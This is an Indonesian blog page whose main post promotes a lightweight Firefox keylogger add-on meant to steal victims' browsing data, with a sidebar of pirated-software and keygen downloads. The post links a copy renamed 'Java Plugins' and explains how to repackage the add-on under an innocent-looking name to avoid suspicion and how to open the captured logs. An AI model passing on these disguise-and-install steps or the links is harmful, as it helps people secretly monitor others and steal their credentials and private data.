• TRANSFORMERS 3: DARK Of THE MOON

    Pemerintah Amerika selama ini ternyata tak sepenuhnya jujur mengungkapkan apa yang mereka ketahui. Selama bertahun-tahun mereka mencoba mencari tahu tentang keberadaan makhluk hidup lain selain manusia yang menghuni bumi namun mereka tak pernah mengatakan kalau sebenarnya mereka telah memiliki sejumlah bukti..

  • Download Update PES 2011

    Agan-agan silahkan download update PES 2011 transfer Agustus 2011

  • BitDefender Total Security 2010 Full Version + Patch

    BitDefender Total Security 2010 Build 13.0.15.297 adalah antivirus yang dirancang untuk memberikan perlindungan proaktif komprehensif terhadap virus, spyware, hacker, spam dan ancaman keamanan internet lainnya. Bukan hanya itu saja, antivirus ini juga memelihara sistem dari ganguan virus dan dilengkapi dengan backup data

  • Download Wondershare DemoCreator

    Wondershare DemoCreator 3 Full Version with Serial Keygen merupakan salah satu software yang dapat anda gunakan untuk membuat Demo atau Tutorial baik dalam bentuk Video maupun dalam bentuk Gambar. Wondershare DemoCreator 3 Full Keygen ini cocok bagi anda yang ingin membuat tutorial melalui desktop anda secara mudah dan cepat

  • download microsoft visio 2007

    Microsoft Visio (atau sering disebut Visio) adalah sebuah program aplikasi komputer yang sering digunakan untuk membuat diagram, diagram alir (flowchart), brainstorm, dan skema jaringan yang dirilis oleh Microsoft Corporation. Aplikasi ini menggunakan grafik vektor untuk membuat diagram-diagramnya. Visio aslinya bukanlah buatan Microsoft Corporation, melainkan buatan Visio Corporation, yang diakusisisi oleh Microsoft pada tahun 2000.

  • Internet Download Manager

    Internet Download Manager atau biasa disingkat IDM , adalah perangkat lunak yang mampumengunduh data-data yang ada di internet dan meneruskan kembali. Perangkat buatan New York, Amerika ini menempati posisi teratas dalam memaksimalkan kecepatan mengunduh data. Tampilan dan grafis yang sederhana membuat IDM lebih bersahabat dengan penggunanya. IDM didukung dengan fitur meneruskan kembali, yaitu untuk mengunduh ulang berkas-berkas yang sebelumnya terputus karena masalah teknis maupun nonteknis. IDM juga memiliki fitur unduh yang cepat dengan kemampuan melakukan segmentasi berkas secara otomatis dan didukung dengan teknologi yang aman.

Thursday, September 15, 2011

K-logger Ringan Anti Detect Antivirus


Add caption
Sebelumnya ane bingung, kenapa orang nyari2 keylogger yang bentuknya full aplikasi, sedangkan UMUMNYA orang kan ingin mencuri data browsing korban, jadi buat apa pake keylogger yang sampe logging ketikkan ms.word, excel, dll?

Size:
Less than 5 KB



Link (100% CLEAN) Smile:
Original: https://addons.mozilla.org/id/firefox/addon/keylogger-220858/ dengan nama addon, Play Musik dan interface English.

Edited: http://sandikovsky.110mb.com/uploadan/keylogger-1.5-fx.xpi dengan nama addon Java Plugins dan interface bahasa Indo.

How to Use?
Setelah di install di browser Firefox, tekan ALT + L, lalu kalian diminta password master untuk membuka file log-nya, INGAT, JANGAN SAMPAI LUPA!! Karena meski sudah di uninstall addon-nya, password ttap tidak tereset.

TIPS:
--------
Kalo ga salah nama plugin sewaktu di install adalah Play Music (menghindari kecurigaan, meski mgkin masih dicurigai), tapi klo bisa di edit aja add on kloggernya itu, caranya:

Ganti eksistensi format .xpi dengan .zip, lalu ekstrak, nah kalian bisa edit file install.rdf untuk mengubah nama addon sesuka kalian, dan edit file overlay.js untuk mengubah interface message, kalian bisa mengedit dengan notepad.
Setelah itu hasil ekstrak tadi yang sudah di edit, kalian ekstrak lagi dengan format zip, lalu ubah .zip menjadi .xpi, lalu open with Firefox. Then voila... Very Happy Very Happy

Tapi klo kalian ga mau cape2 edit untuk ubah nama addon, ane udah siapin file jadinya kok di link atas ^^ Itu udah ane ganti interface message jadi bhs Indo dan nama addon-nya menjadi Java Plugins, jadi silahkan mau pakai yang mana, 22nya sama2 worked 100% & no tepu!! Wink

TAMBAHAN
Klogger ini full bekerja secara OFFLINE, jadi ga usah khawatir ada yang mau mencuri data kalian, dan satu lagi, file log-nya itu disimpan di direktori X, nah jika kalian langsung mengakses filenya, maka file tersebut otomatis kosong/deleted sebagai antisipasi ada yang mau mencuri data log kamu, jadi jangan pernah mengakses langsung ke direktori X

0 komentar: